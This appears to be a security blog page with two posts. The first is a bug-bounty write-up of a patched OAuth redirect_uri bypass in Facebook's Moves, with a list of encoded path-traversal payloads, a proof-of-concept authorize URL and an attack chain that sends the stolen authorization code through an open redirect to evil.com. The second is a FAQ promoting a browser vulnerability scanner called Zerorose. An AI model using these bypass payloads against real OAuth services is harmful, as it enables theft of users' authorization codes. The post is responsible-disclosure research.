Facebook's Moves - OAuth redirect_uri bypass

3:53 PM

This is going to a very short post about a redirect_uri bypass technique I found in Moves.

Moves is a company owned by Facebook and one of the acquisitions in scope for the bug bounty program they are running.

I have written about an XSS bug caused in this same parameter entitled "Moves OAuth XSS" and this will cover a not so common redirect_uri bypass method.

Anyway, there are a lot of known ways to bypass redirect_uri's in OAuth, it all depends on what server side check we are facing and what limitation factors there are. for instance, in Facebook's case, if you set your applications allowed callback to https://www.anyurl.com/directory it will allow that+ anything following it. so https://www.anyurl.com/directory/anotherdirectory?y=xz is considered perfectly valid. some other sites like Coinbase & Uber implement it differently. and addition of any queries, directories or domains will be considered invalid so scenarios that worked on Facebook will be invalid.

That leaves some OAuth clients heavily misconfigured and sometimes causes serious issues like OAuth bypasses possible.

However, there are sometimes confusions on the server handling these urls (often since dealing with url encoded values) and some bypasses are possible. 
Consider a site that configured its allowed callback url to https://example.com/some/path.

Possible bypasses to tamper with sub-directories:

  1. https://example.com/some/path
  2. https://example.com/some/path/../../new/path
  3. https://example.com/some/path/%2e%2e/%2e%2e/new/path
  4. https://example.com/some/path/%252e%252e/%252e%252e/new/path (double encoded)
  5. https://example.com/new/path///../../some/path/
  6. https://example.com/some/path/.%0a./.%0d./new/path (for servers ignoring nonprintable CRLF chracters)   
 In moves case, I used the 5th example. it basically confuses the parser and thus let it assume /new/path/ is the allowed subdir.

PoC app: https://api.moves-app.com/oauth/v1/authorize?response_type=code&client_id=2KQ3D5coba76A5eg42mlu3L3Kd3btEeS&scope=location&redirect_uri=https://example.com/new/path///../../some/path/ (obviously patched)

That application, although configured to redirect to https://example.com/some/path it will redirect to https://example.com/new/path 

Attack Scenario:

Consider an open redirect in example.com like https://example.com/somepath/redirect?to=evil.com
If the developer set the callback to https://example.com/moves/callback he will expect the OAuth provider won't accept other paths. (so open redirect is low priority here)

However, using the bypass, we create our malicious path like:
https://example.com/somepath/redirect%3fto%3devil.com%23///../../moves/callback/

We encode the characters so it will be considered as a path and not tamper with the parser. 
the %23 (#) is added at the end to not let the other path following (../moves/callback) matter.

that will redirect to https://example.com/somepath/redirect?to=evil.com#/moves/callback?code=CODE (my precious) and we just get our stolen code via document.hash and game over!

Here is a video poc




Report Timeline

Apr 29 - Inital Report
May 6 - Triage
May 9 - Patch

Introducing Zerorose - The Anti Exploitkit.

5:26 PM












Since a couple months back, I & a friend have been working on an interesting project called Zerorose. basically its a web vulnerability scanner, but not in a sense you are probably thinking of. we scan your system vulnerabilities from our site.

...What?

Zerorose is a project that tries to use a couple of machine learning algorithms to analyze known vulnerabilities in the visitors system. It does this by identifying plugins, browser, OS, common misconfigurations and similar key identifiers, and checking if any of them are known to be vulnerable for any issues, if they are or infected with malwares, if they still have support, if their compatibility/installation can cause other issues or best practice bypasses. we try to make Exploitkits, adwares and other malicious infections like ransomwares doesn’t happen.

 “An exploit kit is a software kit designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it, and discovering and exploiting vulnerabilities to upload and execute malicious code on the client. One of the earlier kits was MPack, in 2006. Exploit kits are often designed to be modular and easy to use, enabling the addition of new vulnerabilities and the removal of existing ones.

Do you have a cool video so that I can show my friends?

Duh. 

In short: we identify exploitable vulnerabilities (hopfully) before the bad guys do. so you can roam the internet free without automatic client side exploits triggering out of infected, shady sites, malvertising campaigns and that porn site you sometimes visit.

False Positives

Although we try to deliver reliable and actionable information, it is possible for the system to assume and identify non-existent issues because of a number of factors. This could be because you using a modified user agent, using modified plugins or the names of plugins, addons or scripts you using matching a known malware. if that is the case, you can click on "Report" at the right side of the report and it will try to evaluate (of course, with manual check) & learn from its mistakes.

How are you different from exploit kits?

You may have heard of Blackhole, Crime, Angler or other exploit kits. What they are doing is not much different from us, except maybe: we are helping you patch instead exploit them & we are cooler in many ways. ;))

Can I trust zerorose?

Of course. *promises*

Are you the only one doing this?

As far as we are aware, yes. Us and exploit kits.

Why not open source?

We figured it’s quite easier to visit our website than download/run it in your host everytime you want to scan something, and that data will soon be outdated. That and we don’t want to share our codez.

Why is it free?

Honestly, we have no idea. I know its a bit suspicious why we went this far to build this but it was mostly done just because we care. =))

Do you accept donations?

Yes, we welcome any kind of help being we are a small team doing this in a part time. please click here to do that.
I hope you find this interesting & it helped you.